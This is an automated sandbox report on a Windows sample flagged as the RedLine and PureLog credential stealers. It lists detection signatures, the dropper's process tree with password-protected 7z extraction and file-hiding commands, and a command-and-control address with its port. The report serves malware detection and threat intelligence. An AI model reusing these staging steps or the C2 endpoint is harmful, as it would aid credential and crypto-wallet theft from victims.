Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jjjUC5ggb2nQMb1B6SvBkwmT.exe

Overview

General Information

Sample name:jjjUC5ggb2nQMb1B6SvBkwmT.exe
Analysis ID:1483181
MD5:9795b9f24e9a98ae78f7cad809ed1e2a
SHA1:d92325ce71ae6bd9af9b74b1cc67f81dbb033020
SHA256:a36a4fce0902ebb99f0a8441b024a03c2f1cd66063c59391257f0f96ea9ee5fb
Tags:exe
Infos:

Detection

PureLog Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Drops password protected ZIP file
Found many strings related to Crypto-Wallets (likely being stolen)
Installs new ROOT certificates
Machine Learning detection for dropped file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • jjjUC5ggb2nQMb1B6SvBkwmT.exe (PID: 2700 cmdline: "C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe" MD5: 9795B9F24E9A98AE78F7CAD809ED1E2A)
    • cmd.exe (PID: 3160 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mode.com (PID: 6552 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
      • 7z.exe (PID: 4956 cmdline: 7z.exe e file.zip -p324051139125346723019431074 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
      • 7z.exe (PID: 5664 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
      • 7z.exe (PID: 6284 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
      • 7z.exe (PID: 1076 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
      • 7z.exe (PID: 380 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
      • attrib.exe (PID: 1264 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • in.exe (PID: 5036 cmdline: "in.exe" MD5: E8937B534F6C730C0A82793CCDDC0692)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "23.94.183.150:5058"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  Process Memory Space: in.exe PID: 5036JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 1 entries
                    SourceRuleDescriptionAuthorStrings
                    11.0.in.exe.420000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      11.0.in.exe.420000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        No Sigma rule has matched
                        No Snort rule has matched
                        Timestamp:2024-07-26T19:26:04.138395+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:06.203650+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:07.970977+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:03.883701+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:07.460720+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:07.587021+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:07.825893+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:05.217520+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:06.325866+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:05.095680+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:07.338019+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:05.550691+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:04.344095+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:06.792190+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:25:58.453702+0200
                        SID:2046045
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:04.968474+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:05.420008+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:05.710903+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:04.350286+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:25:58.572801+0200
                        SID:2043234
                        Source Port:5058
                        Destination Port:49706
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:03.753284+0200
                        SID:2046056
                        Source Port:5058
                        Destination Port:49706
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:04.010813+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:50.503417+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:49714
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:06.446924+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:05.878741+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:06.616210+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:03.624089+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:07.706698+0200
                        SID:2043231
                        Source Port:49706
                        Destination Port:5058
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T19:26:12.288163+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:49707
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: in.exe.5036.11.memstrminMalware Configuration Extractor: RedLine {"C2 url": "23.94.183.150:5058"}
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
                        Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJoe Sandbox ML: detected
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040367D
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004031DC
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00457978 FindFirstFileW,FindFirstFileW,free,5_2_00457978
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0045881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,5_2_0045881C
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h11_2_00E50944
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h11_2_00E50939
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 4x nop then jmp 08A974B2h11_2_08A97408
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 4x nop then jmp 08A974B2h11_2_08A97400

                        Networking

                        barindex
                        Source: Malware configuration extractorURLs: 23.94.183.150:5058
                        Source: global trafficTCP traffic: 192.168.2.5:49706 -> 23.94.183.150:5058
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.94.183.150
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeString found in binary or memory: http://ocsp.sectigo.com0
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
